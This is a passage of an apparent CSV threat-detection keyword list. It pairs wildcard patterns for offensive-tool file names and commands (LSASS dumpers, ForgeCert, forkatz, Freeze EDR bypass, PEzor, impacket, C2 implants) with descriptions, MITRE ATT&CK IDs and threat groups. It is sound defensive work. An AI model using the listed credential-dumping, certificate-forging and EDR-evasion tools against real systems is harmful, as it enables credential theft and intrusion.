- T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/alfarom256/BOF-ForeignLsass","1","0","N/A","10","10","96","25","2021-08-23T16:57:08Z","2021-08-21T00:19:29Z" +"*foreign_lsass.c*","offensive_tool_keyword","cobaltstrike","LSASS Dumping With Foreign Handles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - 
T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/alfarom256/BOF-ForeignLsass","1","1","N/A","10","10","96","25","2021-08-23T16:57:08Z","2021-08-21T00:19:29Z" +"*foreign_lsass.x64*","offensive_tool_keyword","cobaltstrike","LSASS Dumping With Foreign Handles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/alfarom256/BOF-ForeignLsass","1","1","N/A","10","10","96","25","2021-08-23T16:57:08Z","2021-08-21T00:19:29Z" 
+"*foreign_lsass.x86*","offensive_tool_keyword","cobaltstrike","LSASS Dumping With Foreign Handles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/alfarom256/BOF-ForeignLsass","1","1","N/A","10","10","96","25","2021-08-23T16:57:08Z","2021-08-21T00:19:29Z" +"*forge_ticket.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*forge_ticket_spec.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ForgeCert.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*ForgeCert-main*","offensive_tool_keyword","ForgeCert","ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.","T1553.002 - T1136.003 - T1059.001","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GhostPack/ForgeCert","1","1","N/A","10","6","538","87","2022-10-07T18:18:09Z","2021-06-09T22:04:18Z" +"*forkatz.exe*","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","1","N/A","10","2","122","15","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z" +"*forkatz.sln*","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","1","N/A","10","2","122","15","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z" +"*forkatz.vcxproj*","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential 
Access","https://github.com/Barbarisch/forkatz","1","1","N/A","10","2","122","15","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z" +"*forkatz-main*","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","1","N/A","10","2","122","15","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z" +"*-format=dotnet-createsection -sleep*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*--format-string ziiiiizzzb * ","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly 
module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" +"*--format-string ziiiiizzzib *","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" +"*fortalice/bofhound*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" +"*fortra/impacket*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*FortyNorthSecurity*","offensive_tool_keyword","Github Username","FortyNorth Security is a computer security consultancy specializing in offensive security work. We regularly perform red team assessments. pen tests. 
and more","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/FortyNorthSecurity","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*FortyNorthSecurity/CIMplant*","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","1","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" +"*FortyNorthSecurity/FunctionalC2*","offensive_tool_keyword","FunctionalC2","A small POC of using Azure Functions to relay communications","T1021.006 - T1132.002 - T1071.001","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/FortyNorthSecurity/FunctionalC2","1","1","N/A","10","10","58","15","2023-03-30T20:27:38Z","2020-03-12T17:54:50Z" +"*found-passwords.txt*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*FourEye(shellcode_bypass*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" +"*FourEye-main*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","1","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" +"*fox-it/adconnectdump*","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active 
Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","10","6","507","84","2023-08-21T00:00:08Z","2019-04-09T07:41:42Z" +"*fox-it/BloodHound*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*foxlox/hypobrychium*","offensive_tool_keyword","hypobrychium","hypobrychium AV/EDR Bypass","T1562.001 - T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/foxlox/hypobrychium","1","1","N/A","8","1","72","21","2023-07-21T21:13:20Z","2023-07-18T09:55:07Z" +"*fpc -c Seatbelt*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*FrameManagementAssociationRequest.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*FrameManagementDeauthentication.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*FrameManagementProbeRequest.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*FrameManagementReassociationResponse.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*framework/obfuscation/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*framework-114634acb84f8baa.js*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*Framework-MobSF*","offensive_tool_keyword","Mobile-Security-Framework-MobSF","Mobile Security Framework (MobSF) is an automated. all-in-one mobile application (Android/iOS/Windows) pen-testing. malware analysis and security assessment framework capable of performing static and dynamic analysis. MobSF support mobile app binaries (APK. XAPK. IPA & APPX) along with zipped source code and provides REST APIs for seamless integration with your CI/CD or DevSecOps pipeline.The Dynamic Analyzer helps you to perform runtime security assessment and interactive instrumented testing.","T1565.001 - T1565.002 - T1565.003 - T1565.004 - T1523","TA0007 - TA0010 - TA0003","N/A","N/A","Frameworks","https://github.com/MobSF/Mobile-Security-Framework-MobSF","1","1","N/A","N/A","10","14948","3006","2023-10-03T20:48:09Z","2015-01-31T04:36:01Z" +"*frampton.py*","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. 
shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","POST Exploitation tools","https://github.com/ins1gn1a/Frampton","1","1","N/A","N/A","1","69","16","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z" +"*freenas_reverse_root_shell_csrf*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*Freeze_*_darwin_amd64*","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","1","N/A","N/A","10","1334","166","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z" +"*Freeze_*_linux_amd64*","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. 
and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","1","N/A","N/A","10","1334","166","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z" +"*Freeze-rs -*","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","0","N/A","N/A","7","665","70","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z" +"*Freeze-rs.exe*","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","1","N/A","N/A","7","665","70","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z" +"*Freeze-rs_darwin_amd64*","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","1","N/A","N/A","7","665","70","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z" +"*Freeze-rs_linux_amd64*","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. 
direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","1","N/A","N/A","7","665","70","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z" +"*Freeze-rs_windows_amd64.exe*","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","1","N/A","N/A","7","665","70","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z" +"*frida -l disableRoot.js -f owasp.mstg.uncrackable1*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*frida-ps -U*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*frida-trace -x ntdll.dll -i * -p *","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*frkngksl/NimExec*","offensive_tool_keyword","NimExec","Fileless Command Execution for Lateral Movement in Nim","T1021.006 - T1059.005 - T1564.001","TA0008 - TA0002 - TA0040","N/A","N/A","Exploitation 
Tools","https://github.com/frkngksl/NimExec","1","1","N/A","N/A","4","307","33","2023-06-23T11:07:20Z","2023-04-21T19:46:53Z" +"*from .core import Fuzzer*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*from .wfuzz import *","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*from bofhound import *","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" +"*from bofhound.ad import*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" +"*from burp import *","offensive_tool_keyword","ActiveScanPlusPlus","ActiveScan++ 